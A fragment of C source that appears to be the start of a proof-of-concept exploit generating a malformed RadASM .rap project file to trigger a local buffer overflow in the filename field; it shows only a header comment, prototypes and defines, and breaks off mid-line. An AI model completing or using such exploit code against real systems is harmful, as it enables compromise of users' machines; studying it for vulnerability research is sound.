/*Radasm .rap file local buffer overflow POC I'll be back in a few hours with the exploit. The vuln is in the filename field. snip [Files]...1=AVP OVERFLOW... snip */ #include void gen_random(char*,const int); void print(char*); unsigned int getFsize(FILE*,char*); void buildfile(char*); #define VULNF "qq.rap" #define VER "2.2.1.6" #define POCNAME "Radasm .rap file local buffer overflow POC" #define AUTHOR "fl0 fl0w" #define IF(x,NULL) if(x==NULL) #define FOR(i,a,b) for(i=a;i